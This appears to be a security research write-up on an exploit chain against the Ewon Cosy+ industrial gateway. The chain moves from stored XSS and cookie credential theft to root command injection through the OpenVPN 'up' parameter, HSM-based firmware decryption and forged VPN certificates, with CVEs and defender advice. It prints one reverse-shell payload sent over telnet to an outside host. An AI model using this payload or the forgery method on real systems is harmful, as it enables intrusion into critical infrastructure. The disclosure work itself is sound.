Breaking the Ewon Cosy+ Industrial Gateway: From XSS to Root

TLDR: This research details a multi-stage exploit chain against the Ewon Cosy+ industrial gateway, moving from a persistent XSS in the FTP login to full root access. By bypassing hardware-backed security, the researcher successfully extracted firmware-specific encryption keys and generated valid, signed VPN authentication certificates. This work highlights the critical risk of trusting hardware security modules when the surrounding software implementation fails to properly isolate sensitive operations.

Industrial control systems often rely on remote access gateways to bridge the gap between field devices and the outside world. These devices are the literal keys to the kingdom, yet they frequently suffer from the same class of vulnerabilities as standard web applications. The Ewon Cosy+ gateway is a prime example of how a chain of seemingly minor flaws can lead to a complete compromise of critical infrastructure.

The Attack Chain

The research begins with a persistent cross-site scripting (XSS) vulnerability triggered during the FTP login process. When an administrator logs into the web interface, the gateway logs the attempt. If an attacker injects malicious JavaScript into the username field during a failed login, that script executes in the context of the administrator's browser session.

This is not just a theoretical concern. Because the device stores administrative credentials in an insecure cookie, the injected script can easily exfiltrate these credentials. Once the attacker has the admin password, they can access the device's configuration settings. The gateway allows users to upload custom OpenVPN configuration files. By modifying the up parameter in a custom configuration, an attacker can execute arbitrary commands with root privileges.

The command injection is straightforward. By adding two dashes to the up parameter, the attacker bypasses the built-in filter that prevents the execution of custom scripts. The following payload demonstrates how to initiate a reverse shell:

--up "/bin/sh -c 'TF=$(mktemp -u);mkfifo $TF;telnet 192.168.33.1 5000 0<$TF | sh >$TF 2>&1'"

Bypassing Hardware Security

Many vendors rely on hardware security modules (HSM) to protect sensitive data, assuming that if the hardware is secure, the system is secure. This research proves that assumption wrong. The Ewon Cosy+ uses an NXP i.MX6 processor and an HSM to handle cryptographic operations. However, the software implementation fails to properly isolate these operations.

The researcher discovered that firmware update files are encrypted, but the device must decrypt them to install them. By gaining root access, the researcher was able to reverse-engineer the update process. They found that the device reads a key type, an encrypted AES key, and an initialization vector (IV) from the update file. The encrypted key is passed to the HSM, which returns the plaintext key. With this key, the researcher could decrypt the firmware and extract the parser script, which in turn decrypts the various firmware partitions.

This process reveals a fundamental flaw: the device treats the HSM as a black box for decryption without verifying the integrity of the request. If an attacker can control the software that talks to the HSM, they can force it to decrypt whatever they want.

VPN Hijacking and Certificate Forgery

The most dangerous part of this research is the ability to forge valid VPN authentication certificates. The gateway generates a certificate signing request (CSR) during account assignment and sends it to the vendor's backend. The backend signs the request and returns a certificate containing the device's serial number. This serial number is then used by the VPN server to assign the device to a specific account.

By obtaining a valid serial number for a device located at the vendor's lab, the researcher was able to generate a CSR for that serial number. Because the backend does not verify that the requester actually owns the serial number, it signed the request. The researcher then used this forged certificate to initiate a VPN session, effectively hijacking the connection of the original device.

This technique is devastating. It allows an attacker to disconnect legitimate users and intercept their traffic. Since the VPN tunnel lacks network restrictions, the attacker can access all services on the connected client's network. This is a clear case of broken access control and identification and authentication failures.

Real-World Impact

For a pentester, this research is a masterclass in chaining vulnerabilities. You are unlikely to find a single "magic" exploit that grants root access. Instead, you must look for the small, often overlooked bugs—like an XSS in a log file or a filter that can be bypassed with a simple command-line trick.

The impact of this attack is not limited to a single device. Because the vendor's infrastructure is centralized, a single forged certificate can be used to target any device on the network. The CVE entries associated with this research, including CVE-2024-33892, CVE-2024-33896, CVE-2024-33895, CVE-2024-33894, and CVE-2024-33897, demonstrate the breadth of the issue.

Defenders must prioritize patching these devices and, more importantly, implementing strict network segmentation. A remote access gateway should never have unrestricted access to the internal network. If you are managing these devices, ensure that the firmware is up to date and that you are monitoring for unusual VPN activity.

The next time you are auditing an IoT device, don't just look for open ports. Look at how the device handles its own security. Does it trust the hardware blindly? Does it allow users to upload arbitrary configurations? These are the questions that lead to the most impactful findings. Keep digging, and don't assume that a "secure" label means the device is actually secure.